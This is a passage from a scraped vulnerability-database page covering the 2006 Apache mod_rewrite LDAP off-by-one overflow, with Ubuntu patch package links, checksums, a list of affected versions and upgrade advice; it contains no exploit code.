      Size/MD5:   209402 fd1537a75780215c521eaa1d86f6dac0
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.54-5ubuntu4.1_sparc.deb
      Size/MD5:   205052 c671dc14f003efd78724b590bd47c17a
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.54-5ubuntu4.1_sparc.deb
      Size/MD5:   208612 9a3bd42326cf873f0d75edad80400a1f
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.54-5ubuntu4.1_sparc.deb
      Size/MD5:   169440 e57d15a89648fc725f8c2e57517ce839
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.54-5ubuntu4.1_sparc.deb
      Size/MD5:   170182 97633fec703ccf87290d8cd258098ccc
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.54-5ubuntu4.1_sparc.deb
      Size/MD5:    93092 5dd42a24b752012bd4f10676f91bb7d3
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.54-5ubuntu4.1_sparc.deb
      Size/MD5:    35146 c72067dac60dcaf6995186411ce8a714
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.54-5ubuntu4.1_sparc.deb
      Size/MD5:   264966 19a4f77fea0a28b9097bda0f77b533a8
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.54-5ubuntu4.1_sparc.deb
      Size/MD5:   128274 86c0e3518fc19e1371ad928e09ead70b

Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.1.diff.gz
      Size/MD5:   115088 d045e2652698d0cfaa11b9e65252bb67
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.1.dsc
      Size/MD5:     1148 cda4a30a1e278c238b1dc2e9c8098655
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55.orig.tar.gz
      Size/MD5:  6092031 45e32c9432a8e3cf4227f5af91b03622
    http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache_1.3.34-2ubuntu0.1.diff.gz
      Size/MD5:   352050 67258b257c6267ff4f822a67098ca9ad
    http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache_1.3.34-2ubuntu0.1.dsc
      Size/MD5:     1102 1bd4dbdc8388cc6e4c79322f31cb8151
    http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache_1.3.34.orig.tar.gz
      Size/MD5:  3105068 9d289f80ddca7389ab9bc6970636d6ad

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-dev_1.3.34-2ubuntu0.1_all.deb
      Size/MD5:   332876 a5a005bf56c8c1dfa4e3128a1cf78f67
    http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-doc_1.3.34-2ubuntu0.1_all.deb
      Size/MD5:  1195566 4d3cbdac9a6fdb435d590dbe90ca4a86
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-doc_2.0.55-4ubuntu2.1_all.deb
      Size/MD5:  2124178 dffcfe4126e3b53e32d19166bf3f853f

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-common_1.3.34-2ubuntu0.1_amd64.deb
      Size/MD5:   875232 49196a7f16300f0968d03e26b87f4112
    http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-dbg_1.3.34-2ubuntu0.1_amd64.deb
      Size/MD5:  8868800 609262555eed5f16f37a05937557ac71
    http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-perl_1.3.34-2ubuntu0.1_amd64.deb
      Size/MD5:   533004 01819af5f2f36a4a109575b0340e3a01
    http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-ssl_1.3.34-2ubuntu0.1_amd64.deb
      Size/MD5:   517002 962478c0d73709e5ebadb6698a5b35bb
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu2.1_amd64.deb
      Size/MD5:   832826 46d8ac4963392385b154ee311717b125
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu2.1_amd64.deb
      Size/MD5:   227652 e57d6f19beb0cc3c731a22396037f853
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu2.1_amd64.deb
      Size/MD5:   222770 36d29beb67174e796f22770f812e521e
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu2.1_amd64.deb
      Size/MD5:   227350 1dd4f42480f3801041a40f338c77be79
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu2.1_amd64.deb
      Size/MD5:   170918 7e0203cdf1f52291bd37207736a8bab8
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu2.1_amd64.deb
      Size/MD5:   171690 4f9fd4647a2df63abd84ae7c6f296efa
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu2.1_amd64.deb
      Size/MD5:    93770 7a4a247b34afd27c9e81f222e7b26a9e
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.1_amd64.deb
      Size/MD5:    35748 807f1c5a0f5d94370e5f7c712517d77c
    http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache_1.3.34-2ubuntu0.1_amd64.deb
      Size/MD5:   408106 3b8da12e0330f042fbb082e61014097d
    http://security.ubuntu.com/ubuntu/pool/universe/a/apache/libapache-mod-perl_1.29.0.4-2ubuntu0.1_amd64.deb
      Size/MD5:   495138 2eee03a0677d1b236f4798257fa671a3
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu2.1_amd64.deb
      Size/MD5:   285168 7c95e82707461eb6fe6139af048e5386
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu2.1_amd64.deb
      Size/MD5:   143804 df89f11a7f4fd5010c827ec9e8897af5

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-common_1.3.34-2ubuntu0.1_i386.deb
      Size/MD5:   836848 d4e547eca9e76aa5e2e0e4344fe68595
    http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-dbg_1.3.34-2ubuntu0.1_i386.deb
      Size/MD5:  8630002 9a8de2e1f34e3401f6bc4c85faf79643
    http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-perl_1.3.34-2ubuntu0.1_i386.deb
      Size/MD5:   499622 c7a9b16e4a979eafe4955368a70f76cc
    http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-ssl_1.3.34-2ubuntu0.1_i386.deb
      Size/MD5:   487480 010350ad0468be173b27cd687fa7bfb0
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu2.1_i386.deb
      Size/MD5:   785996 1e7eba9a96e1c96b24c425fc1d1b0c8e
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu2.1_i386.deb
      Size/MD5:   202290 dbb1357c99b8a574b6436e858db28767
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu2.1_i386.deb
      Size/MD5:   198272 a6009454cdd2743972c5f4c821dd5dea
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu2.1_i386.deb
      Size/MD5:   201822 c482c5e814f1bb93fc5be21349f21a08
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu2.1_i386.deb
      Size/MD5:   170934 df6d16ffdeac51db8b96afd789bbb72c
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu2.1_i386.deb
      Size/MD5:   171698 2ca5dee34aebf25d7d0d4036babddab0
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu2.1_i386.deb
      Size/MD5:    91722 c8921ae03c537badefaf5254f491b0e5
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.1_i386.deb
      Size/MD5:    35754 e0c31ed00cec17eb1ee96b06091f4101
    http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache_1.3.34-2ubuntu0.1_i386.deb
      Size/MD5:   384724 ba1902bbd2db824e53ff1793252e5260
    http://security.ubuntu.com/ubuntu/pool/universe/a/apache/libapache-mod-perl_1.29.0.4-2ubuntu0.1_i386.deb
      Size/MD5:   489468 a4bf30924bedcd2c08254294e32877fc
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu2.1_i386.deb
      Size/MD5:   261268 e4645315c2f1ea2cfda97220513c3129
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu2.1_i386.deb
      Size/MD5:   131698 f7cab6c91b232acd83a711d0cb8dce4b

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-common_1.3.34-2ubuntu0.1_powerpc.deb
      Size/MD5:   916034 11f263805524e1485c87436981f4a0ff
    http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-dbg_1.3.34-2ubuntu0.1_powerpc.deb
      Size/MD5:  8951098 9696192a5d27810ef15d8adac8a998e1
    http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-perl_1.3.34-2ubuntu0.1_powerpc.deb
      Size/MD5:   523778 8b04ab792246c49a9f6396a050a51a17
    http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-ssl_1.3.34-2ubuntu0.1_powerpc.deb
      Size/MD5:   513608 802726ffd0f1608fe5368cc01380636f
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu2.1_powerpc.deb
      Size/MD5:   858972 127e8eaf484042684f6333e13eec5364
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu2.1_powerpc.deb
      Size/MD5:   219670 666bbf96509154d2733eac8bf420ad42
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu2.1_powerpc.deb
      Size/MD5:   215272 bc9bdc143359a2cd379e6d92b603695f
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu2.1_powerpc.deb
      Size/MD5:   219192 1fb310e239bdc4eb50c402481424c109
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu2.1_powerpc.deb
      Size/MD5:   170938 21604d1e84accd9d391a8ffa9270814b
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu2.1_powerpc.deb
      Size/MD5:   171708 74cedc7b0b07a705ebf86cdfca83be39
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu2.1_powerpc.deb
      Size/MD5:   103484 e1c6572ce8ca8b87e3d02d6e10811d0b
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.1_powerpc.deb
      Size/MD5:    35756 63150684c36485680f904bff7f0f33dd
    http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache_1.3.34-2ubuntu0.1_powerpc.deb
      Size/MD5:   404376 f0b7221c76c25c23000c89b98748182b
    http://security.ubuntu.com/ubuntu/pool/universe/a/apache/libapache-mod-perl_1.29.0.4-2ubuntu0.1_powerpc.deb
      Size/MD5:   492342 a39edb0bf286a1ad00fbdad7b0b34a87
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu2.1_powerpc.deb
      Size/MD5:   280794 9b3f787e252992a4cfc8701834c8e264
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu2.1_powerpc.deb
      Size/MD5:   140906 e46af1711b11881f6fced5dcbdc4ded4

  sparc architecture (Sun SPARC/UltraSPARC)

    http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-common_1.3.34-2ubuntu0.1_sparc.deb
      Size/MD5:   848164 bf16bc264a7cb4fb4b00589ce876fbf3
    http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-dbg_1.3.34-2ubuntu0.1_sparc.deb
      Size/MD5:  8789014 7491e60fc947bea209b716d6809fb471
    http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-perl_1.3.34-2ubuntu0.1_sparc.deb
      Size/MD5:   510756 a56f486883acab1b8307dee15c33269a
    http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-ssl_1.3.34-2ubuntu0.1_sparc.deb
      Size/MD5:   495232 f062b6639709aebe320e85074c412de4
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu2.1_sparc.deb
      Size/MD5:   803312 9630ce33d497294b2e18354c372c88d0
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu2.1_sparc.deb
      Size/MD5:   209738 4a12d7e0ade0e0fbb3467ebaafa801fb
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu2.1_sparc.deb
      Size/MD5:   205418 730a1dad472f64e718abb6c535236818
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu2.1_sparc.deb
      Size/MD5:   209156 c522212e4be0ee05ce0a4805fce399c7
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu2.1_sparc.deb
      Size/MD5:   170934 4c37d5218adb9a78fd4ac2adc833f6d6
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu2.1_sparc.deb
      Size/MD5:   171720 804531314e706f5552bf60b491c3126b
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu2.1_sparc.deb
      Size/MD5:    92830 9ca8aec605259f6690d368817e0441eb
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.1_sparc.deb
      Size/MD5:    35760 bc262d6c6a7b328586ec5eeb53e6fd20
    http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache_1.3.34-2ubuntu0.1_sparc.deb
      Size/MD5:   391024 1b74b327a8fc46a0c63e7555e754985c
    http://security.ubuntu.com/ubuntu/pool/universe/a/apache/libapache-mod-perl_1.29.0.4-2ubuntu0.1_sparc.deb
      Size/MD5:   490954 4f3aab50fb9e1dca25e32be5fd441a3a
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu2.1_sparc.deb
      Size/MD5:   267372 ffd9172cd880a823248d5e31f0dc38f0
    http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu2.1_sparc.deb
      Size/MD5:   129612 b6389c465ec05e8697b3ea4370014a04

    

- 漏洞信息

27588
Apache HTTP Server mod_rewrite LDAP Protocol URL Handling Overflow
Remote / Network Access Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability
Exploit Public, Exploit Commercial Vendor Verified

- 漏洞描述

A remote overflow exists in Apache HTTP Server's 'mod_rewrite' module when using LDAP scheme handling and specific rules (see technical desc). The Apache Server fails to check input boundaries resulting in an off-by-one overflow. With a specially crafted request, an attacker can cause a denial of service or possibly execute arbitrary code resulting in a loss of integrity and/or availability.

- 时间线

2006-07-28 Unknow
2006-08-20 Unknow

- 解决方案

Upgrade to version 1.3.37, 2.0.59, 2.2.3 or higher, as it has been reported to fix this vulnerability. Alternatively, users can disable mod_rewrite engine (by setting "RewriteEngine off") as a workaround.

- 相关参考

- 漏洞作者

- 漏洞信息

Apache Mod_Rewrite Off-By-One Buffer Overflow Vulnerability
Boundary Condition Error 19204
Yes No
2006-07-28 12:00:00 2011-05-09 07:42:00
Mark Dowd of McAfee Avert Labs discovered this vulnerability.

- 受影响的程序版本

Ubuntu Ubuntu Linux 5.10 sparc
Ubuntu Ubuntu Linux 5.10 powerpc
Ubuntu Ubuntu Linux 5.10 i386
Ubuntu Ubuntu Linux 5.10 amd64
Ubuntu Ubuntu Linux 5.0 4 powerpc
Ubuntu Ubuntu Linux 5.0 4 i386
Ubuntu Ubuntu Linux 5.0 4 amd64
Ubuntu Ubuntu Linux 6.06 LTS sparc
Ubuntu Ubuntu Linux 6.06 LTS powerpc
Ubuntu Ubuntu Linux 6.06 LTS i386
Ubuntu Ubuntu Linux 6.06 LTS amd64
Turbolinux Turbolinux Server 10.0 x86
Turbolinux Turbolinux Server 10.0
Turbolinux Turbolinux Desktop 10.0
Turbolinux Turbolinux FUJI
Turbolinux Turbolinux 10 F...
TurboLinux Personal
TurboLinux Multimedia
Turbolinux Home
Turbolinux Appliance Server 2.0
Trustix Secure Linux 3.0
Trustix Secure Linux 2.2
Trustix Secure Enterprise Linux 2.0
SuSE SUSE Linux Enterprise Server 9
SuSE SUSE Linux Enterprise Server 10
SuSE SUSE Linux Enterprise SDK 10
Sun Solaris 9_x86
Sun Solaris 9_sparc
Sun Solaris 8_x86
Sun Solaris 8_sparc
Sun Solaris 10_x86
Slackware Linux 10.2
Slackware Linux 10.1
Slackware Linux 10.0
Slackware Linux 9.1
Slackware Linux 9.0
Slackware Linux 8.1
Slackware Linux -current
S.u.S.E. Linux Professional 10.0 OSS
S.u.S.E. Linux Professional 10.0
S.u.S.E. Linux Professional 9.3 x86_64
S.u.S.E. Linux Professional 9.3
S.u.S.E. Linux Professional 9.2 x86_64
S.u.S.E. Linux Professional 9.2
S.u.S.E. Linux Professional 10.1
S.u.S.E. Linux Personal 10.0 OSS
S.u.S.E. Linux Personal 9.3 x86_64
S.u.S.E. Linux Personal 9.3
S.u.S.E. Linux Personal 9.2 x86_64
S.u.S.E. Linux Personal 9.2
S.u.S.E. Linux Personal 10.1
S.u.S.E. Linux Enterprise Server for S/390 9.0
S.u.S.E. Linux Enterprise Server for S/390
rPath rPath Linux 1
OpenPKG OpenPKG 2.5
OpenPKG OpenPKG 2.4
OpenPKG OpenPKG 2.3
OpenPKG OpenPKG 2.2
OpenPKG OpenPKG 2.1
OpenPKG OpenPKG 2.0
OpenBSD OpenBSD 3.9
OpenBSD OpenBSD 3.8
MandrakeSoft Multi Network Firewall 2.0
MandrakeSoft Linux Mandrake 2006.0 x86_64
MandrakeSoft Linux Mandrake 2006.0
MandrakeSoft Corporate Server 3.0 x86_64
MandrakeSoft Corporate Server 3.0
IBM Websphere Application Server 6.1 .2
IBM Websphere Application Server 6.1 .1
IBM Websphere Application Server 6.1
IBM Websphere Application Server 6.0.2 .9
IBM Websphere Application Server 6.0.2 .7
IBM Websphere Application Server 6.0.2 .5
IBM Websphere Application Server 6.0.2 .3
IBM Websphere Application Server 6.0.2 .13
IBM Websphere Application Server 6.0.2 .11
IBM Websphere Application Server 6.0.2 .1
IBM Websphere Application Server 6.0.2
IBM HTTP Server 1.3.28 .1
IBM HTTP Server 1.3.26 .2
IBM Hardware Management Console (HMC) for pSeries 6.0 R1.0
IBM Hardware Management Console (HMC) for iSeries 6.0 R1.0
HP Webproxy A.02.10
+ HP HP-UX B.11.04
HP Webproxy A.02.00
HP VirtualVault 4.7
HP VirtualVault A.04.70
HP VirtualVault A.04.60
+ HP HP-UX B.11.04
HP VirtualVault A.04.50
HP System Management Homepage 2.1.6
HP System Management Homepage 2.1.5
HP System Management Homepage 2.1.4
HP System Management Homepage 2.1.3 .132
HP System Management Homepage 2.1.3
HP System Management Homepage 2.1.2
HP System Management Homepage 2.1.1
HP System Management Homepage 2.1
HP System Management Homepage 2.0.2
HP System Management Homepage 2.0.1
HP System Management Homepage 2.0
HP OpenVMS Secure Web Server 1.2
HP OpenVMS Secure Web Server 1.1 -1
HP OpenVMS Secure Web Server 2.1-1
HP OpenView Network Node Manager 7.51
HP OpenView Network Node Manager 7.01
HP OpenView Network Node Manager 6.41
HP HP-UX B.11.23
HP HP-UX B.11.11
HP HP-UX B.11.04
HP HP-UX B.11.00
Gentoo Linux
Debian Linux 3.1 sparc
Debian Linux 3.1 s/390
Debian Linux 3.1 ppc
Debian Linux 3.1 mipsel
Debian Linux 3.1 mips
Debian Linux 3.1 m68k
Debian Linux 3.1 ia-64
Debian Linux 3.1 ia-32
Debian Linux 3.1 hppa
Debian Linux 3.1 arm
Debian Linux 3.1 amd64
Debian Linux 3.1 alpha
Debian Linux 3.1
Apple Mac OS X Server 10.5.2
Apple Mac OS X Server 10.5.1
Apple Mac OS X Server 10.4.11
Apple Mac OS X Server 10.4.10
Apple Mac OS X Server 10.4.9
Apple Mac OS X Server 10.4.8
Apple Mac OS X Server 10.4.7
Apple Mac OS X Server 10.4.6
Apple Mac OS X Server 10.4.5
Apple Mac OS X Server 10.4.4
Apple Mac OS X Server 10.4.3
Apple Mac OS X Server 10.4.2
Apple Mac OS X Server 10.4.1
Apple Mac OS X Server 10.5
Apple Mac OS X 10.4.11
Apple Mac OS X 10.4.10
Apple Mac OS X 10.4.9
Apple Mac OS X 10.4.8
Apple Mac OS X 10.4.7
Apple Mac OS X 10.4.6
Apple Mac OS X 10.4.5
Apple Mac OS X 10.4.4
Apple Mac OS X 10.4.3
Apple Mac OS X 10.4.2
Apple Mac OS X 10.4.1
Apache Software Foundation Apache 2.2 .0
Apache Software Foundation Apache 2.0.56 -dev
Apache Software Foundation Apache 2.0.55
Apache Software Foundation Apache 2.0.54
+ Debian Linux 3.1 sparc
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 amd64
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1
Apache Software Foundation Apache 2.0.53
Apache Software Foundation Apache 2.0.52
Apache Software Foundation Apache 2.0.51
Apache Software Foundation Apache 2.0.50
Apache Software Foundation Apache 2.0.49
Apache Software Foundation Apache 2.0.48
+ MandrakeSoft Linux Mandrake 10.0 AMD64
+ MandrakeSoft Linux Mandrake 10.0
+ S.u.S.E. Linux 8.1
+ S.u.S.E. Linux Personal 9.0 x86_64
+ S.u.S.E. Linux Personal 9.0
+ S.u.S.E. Linux Personal 8.2
+ Trustix Secure Linux 2.1
+ Trustix Secure Linux 2.0
Apache Software Foundation Apache 2.0.47
Apache Software Foundation Apache 2.0.46
Apache Software Foundation Apache 1.3.36
Apache Software Foundation Apache 1.3.35 -dev
Apache Software Foundation Apache 1.3.34
Apache Software Foundation Apache 1.3.33
Apache Software Foundation Apache 1.3.32
+ Gentoo Linux 1.4
+ Gentoo Linux
Apache Software Foundation Apache 1.3.31
+ OpenPKG OpenPKG Current
Apache Software Foundation Apache 1.3.29
+ Apple Mac OS X 10.3.5
+ Apple Mac OS X 10.2.7
+ Apple Mac OS X Server 10.3.5
+ Apple Mac OS X Server 10.2.7
+ MandrakeSoft Linux Mandrake 10.0 AMD64
+ MandrakeSoft Linux Mandrake 10.0
+ OpenPKG OpenPKG 2.0
Apache Software Foundation Apache 1.3.28
+ Conectiva Linux 8.0
+ MandrakeSoft Linux Mandrake 9.2 amd64
+ MandrakeSoft Linux Mandrake 9.2
+ OpenBSD OpenBSD 3.4
+ OpenPKG OpenPKG 1.3
Apache Software Foundation Apache 1.3.9
Apache Software Foundation Apache 1.3.7 -dev
Apache Software Foundation Apache 1.3.6
Apache Software Foundation Apache 1.3.4
Apache Software Foundation Apache 1.3.3
+ RedHat Linux 5.2 sparc
+ RedHat Linux 5.2 i386
+ RedHat Linux 5.2 alpha
IBM Websphere Application Server 6.1 .3
IBM Websphere Application Server 6.0.2 .15
HP System Management Homepage 2.1.9
HP System Management Homepage 2.1.8
HP System Management Homepage 2.1.7
HP OpenVMS Secure Web Server 2.2
Apache Software Foundation Apache 2.2.3
Apache Software Foundation Apache 2.0.59
Apache Software Foundation Apache 1.3.37

- 不受影响的程序版本

IBM Websphere Application Server 6.1 .3
IBM Websphere Application Server 6.0.2 .15
HP System Management Homepage 2.1.9
HP System Management Homepage 2.1.8
HP System Management Homepage 2.1.7
HP OpenVMS Secure Web Server 2.2
Apache Software Foundation Apache 2.2.3
Apache Software Foundation Apache 2.0.59
Apache Software Foundation Apache 1.3.37

- 漏洞讨论

Apache mod_rewrite is prone to an off-by-one buffer-overflow condition.

The vulnerability arising in the mod_rewrite module's ldap scheme handling allows for potential memory corruption when an attacker exploits certain rewrite rules.

An attacker may exploit this issue to trigger a denial-of-service condition. Reportedly, arbitrary code execution may be possible as well.

- 漏洞利用

Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

The following exploits are available:

- 解决方案

The vendor has addressed this issue in version 2.0.53 of the 5.04 branch, in 2.0.54 of the 5.10 branch, and in 2.0.55 of the 6.06 LTS branch. Users are advised to obtain the available update.

Please see the referenced vendor advisories for more information.


Turbolinux Turbolinux 10 F...

Sun Solaris 8_sparc

HP VirtualVault A.04.60

HP Webproxy A.02.10

Turbolinux Turbolinux FUJI

TurboLinux Multimedia

Apache Software Foundation Apache 1.3.29

Turbolinux Turbolinux Server 10.0

Turbolinux Turbolinux Desktop 10.0

Apple Mac OS X 10.4.11

Apple Mac OS X Server 10.4.11

Apple Mac OS X Server 10.5.2

HP System Management Homepage 2.0.2

Apache Software Foundation Apache 2.0.48

Apache Software Foundation Apache 2.0.54

HP System Management Homepage 2.1

HP System Management Homepage 2.1.1

HP System Management Homepage 2.1.4

HP System Management Homepage 2.1.5

HP System Management Homepage 2.1.6

IBM Websphere Application Server 6.0.2 .9

IBM Websphere Application Server 6.0.2 .1

IBM Websphere Application Server 6.0.2

IBM Websphere Application Server 6.0.2 .11

IBM Websphere Application Server 6.0.2 .13

IBM Websphere Application Server 6.1

IBM Websphere Application Server 6.1 .2

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站